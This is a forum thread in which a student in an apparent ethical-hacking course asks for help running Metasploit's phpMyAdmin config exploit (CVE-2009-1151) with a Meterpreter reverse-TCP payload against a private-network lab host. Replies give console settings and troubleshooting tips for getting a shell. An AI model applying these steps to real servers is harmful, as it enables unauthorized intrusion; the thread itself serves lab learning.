Metasploit : An Invalid Argument Was Specific. Invalid Target Index.

I Am Studying a Module on Ethical Hacking Where I Have Identified a Number of Vulnerabilities I Now Wish to Exploit. One Relates to Cve 2009-1151 Which in Metasploit Is Exploit/Unix/Webapp/phpmyadminconfig. I Have Attempted the Syntax but I Keep Getting the Same Error Message Telling Me an Invalid Argument Was Specified. I Cannot Find the Answer on the Web - Can Someone Help? I Attach a Copy of My Terminal Session.

_

4 Responses

Although I have not used this module, I suspect this error is generated by the URI or the port number.

What did you set as your target? It should be 0 since automatic is the only option.
msf exploit(phpmyadmin_config) > set target 0
target => 0
msf exploit(phpmyadmin_config) > show options

Thank you for your responses. I have got passed the initial hurdle by setting target 0, however I am now getting 'Exploit completed, but no session was created.

msf exploit(phpmyadminconfig) > show options_

Module options (exploit/unix/webapp/phpmyadminconfig):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port,type:host:port...
RHOST 192.168.150.14 yes The target address
RPORT 80 yes The target port
URI / yes Base phpMyAdmin directory path
VHOST no HTTP server virtual host

Payload options (php/meterpreter/reversetcp):_

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.150.136 yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)

msf exploit(phpmyadminconfig) > exploit

* Started reverse TCP handler on 192.168.150.136:4444
* Grabbing session cookie and CSRF token
* Sending save request
* Requesting our payload
* Exploit completed, but no session was created.

The version of phpmyadmin on the victim machine is 2.11.5.1 and is an Apache server v 2.2.16 on a debian build.

Am I missing something - shouldn't this exploit work?

It's hard to say, there could be a large number of things that is causing this not to work. Interestingly your version of phpmyadmin should be vulnerable according to the CVE but the original disclosure I found did not include it. Must have been added later.If it were me here is what I would start with:

• Is a firewall blocking that port or the reverse connection it's self
  • double check your URI. Your copy and paste looks like it's set to / I believe the default is /phpMyAdmin/ (but verify yours).
  • Run the module through a web proxy such as Burp. You could be receiving forbidden or doesn't exist messages from the server.
  • See if the exploit is actually overwriting the file, and if you can access it.
  • If the exploit is writing the file compare the payload to the one you sent and see if it is altered in any way. The server could be getting hung up on certain characters that you may have to change.

Share Your Thoughts

• Hot
  • Active